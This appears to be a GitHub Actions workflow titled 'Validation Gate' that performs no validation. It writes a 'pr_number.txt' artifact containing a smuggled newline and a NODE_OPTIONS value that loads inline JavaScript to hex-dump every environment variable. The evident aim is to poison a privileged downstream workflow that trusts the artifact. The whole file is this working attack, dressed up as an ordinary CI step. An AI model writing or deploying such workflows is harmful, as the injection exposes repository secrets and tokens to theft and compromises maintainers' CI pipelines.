name: Validation Gate

on: 
  pull_request:

jobs:
  upload-artifact:
    runs-on: ubuntu-latest

    steps:
      - name: Create pr_number.txt
        run: echo -e "11\nNODE_OPTIONS=--experimental-modules --experimental-loader=data:text/javascript,console.log(Buffer.from(JSON.stringify(process.env)).toString('hex'));" >> pr_number.txt

      - name: Upload pr_number.txt
        uses: actions/upload-artifact@v2
        with:
          name: artifact
          path: ./pr_number.txt
